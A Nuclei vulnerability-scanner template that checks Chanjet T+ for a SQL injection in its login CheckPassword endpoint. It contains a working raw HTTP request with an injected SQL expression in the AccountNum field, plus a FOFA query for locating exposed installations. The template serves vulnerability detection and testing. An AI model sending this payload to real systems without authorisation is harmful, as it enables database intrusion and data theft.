id: chanjet-tplus-ufida-sqli info: name: Chanjet TPluse Ufida.T.SM.Login.UIP - SQL injection author: SleepingBag945 severity: high description: | Chanjet TPluse application has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database. reference: - https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20Plus%20%E5%AE%A1%E8%AE%A1%20%EF%BC%88%E8%B6%85%E8%AF%A6%E7%BB%86%EF%BC%89.md metadata: verified: true max-request: 1 fofa-query: app="畅捷通-TPlus" tags: yonyou,chanjet,sqli http: - raw: - | POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 {"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""} matchers-condition: and matchers: - type: word part: body words: - "0x06d49632c9dc9bcb62aeaef99612ba6b" - "Message\":\"245" - "DatabaseException" condition: and # digest: 4a0a00473045022100c03f33be64bd9268a7ff551b5c5a3f44de37c2dd61d24c23d211a7def1d7af940220789ef8bb75560ebbda53785fe21798edc8d40f3a4dafec080318d8ecec0ff58f:922c64590222798bb761d5b6d8e72950